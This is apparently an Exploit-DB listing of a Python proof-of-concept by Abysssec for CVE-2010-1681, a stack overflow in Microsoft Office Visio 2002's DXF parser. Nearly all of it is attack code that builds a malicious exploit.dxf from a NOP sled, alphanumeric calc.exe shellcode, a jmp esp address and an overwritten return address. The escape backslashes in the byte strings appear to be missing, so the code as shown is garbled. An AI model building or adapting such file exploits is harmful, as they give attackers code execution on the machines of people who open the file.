MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow
# Published : 2010-09-08
# Author : Abysssec
# Previous Title : MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)
# Next Title : Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit

'''
  __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ <  Day 8 (Binary Analysis)
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

 http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/
 http://www.exploit-db.com/sploits/moaub-8-exploit.zip
'''

'''
  Title             : Microsoft Office Visio DXF File Stack based Overflow
  Version           : Microsoft Office Visio 2002(xp)
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.microsoft.com
  Impact            : Ciritial
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-1681
'''

# Tested on Microsoft Office Visio 2002 (xp) in Windows XP SP3

import sys

def main():
   
    try:
		fdR = open('src.dxf', 'rb+')
		strTotal = fdR.read()
		str1 = strTotal[:100]
		str2 = strTotal[1020:1124]
		str3 = strTotal[1128:1169]
		str4 = strTotal[1173:]
		
		eip = "x66x28xC9x61"    # leave popad ret
		jmp = "x64x64xdbx30"    # jmp esp
		
		
		# Modified Alphanumbric calc.exe shellcode 
		shellcode = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xebx00xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49x49x49x48x49x49x49x49x49x49x49x49x49x51x5ax6ax44x58x50x30x41x30x41x6bx41x41x54x42x32x41x42x32x42x41x30x42x41x58x41x50x38x41x42x75x4ax49x69x6cx4bx58x51x54x65x50x57x70x45x50x4ex6bx67x35x35x6cx4ex6bx73x4cx55x55x71x68x67x71x68x6fx6cx4bx52x6fx46x78x4ex6bx51x4fx71x30x74x41x7ax4bx30x49x6cx4bx54x74x6ex6bx76x61x4ax4ex35x61x4bx70x6ax39x4cx6cx4dx54x6bx70x30x74x54x47x6ax61x6ax6ax64x4dx63x31x79x52x4ax4bx69x64x67x4bx32x74x65x74x66x64x31x65x4ax45x6cx4bx71x4fx31x34x57x71x48x6bx52x46x6ex6bx64x4cx52x6bx4ex6bx31x4fx77x6cx54x41x68x6bx4cx4bx57x6cx6cx4bx57x71x4ax4bx4ex69x41x4cx65x74x67x74x4ax63x75x61x4fx30x51x74x6cx4bx61x50x50x30x4fx75x4fx30x32x58x64x4cx4cx4bx71x50x54x4cx4cx4bx70x70x57x6cx4ex4dx6ex6bx73x58x35x58x4ax4bx36x69x6cx4bx4dx50x4cx70x67x70x75x50x37x70x4cx4bx45x38x35x6cx41x4fx57x41x68x76x53x50x30x56x6ex69x6bx48x6fx73x6fx30x63x4bx62x70x30x68x58x70x6fx7ax57x74x51x4fx45x38x6fx68x59x6ex4fx7ax66x6ex62x77x69x6fx38x67x73x53x52x41x30x6cx71x73x64x6ex35x35x30x78x70x65x45x50x44'
		
					
		if len(shellcode) > 920:
			print "[*] Error : Shellcode is too long !"
			return
		if len(shellcode) <= 920:
			dif = 920 - len(shellcode)
			while dif > 0 :
				shellcode += 'x90'
				dif = dif - 1
				
		fdW= open('exploit.dxf', 'wb+')
		fdW.write(str1)
		fdW.write(shellcode)
		fdW.write(str2)
		fdW.write(jmp)
		fdW.write(str3)
		fdW.write(eip)
		fdW.write(str4)	
		
		
		fdW.close()
		fdR.close()
		print '[-] DXF file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
if __name__ == '__main__':
    main()